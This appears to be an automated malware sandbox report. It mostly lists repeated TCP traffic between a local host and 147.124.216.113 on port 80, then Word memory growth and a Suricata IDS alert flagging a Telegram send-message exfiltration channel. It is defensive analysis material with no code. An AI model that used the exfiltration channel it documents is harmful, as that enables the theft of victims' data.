Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 147.124.216.113:80 -> 192.168.2.5:49710
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80
Source: global traffic	TCP traffic: 192.168.2.5:49710 -> 147.124.216.113:80

Source: winword.exe

Memory has grown: Private usage: 1MB later: 59MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:50001 -> 149.154.167.220:443
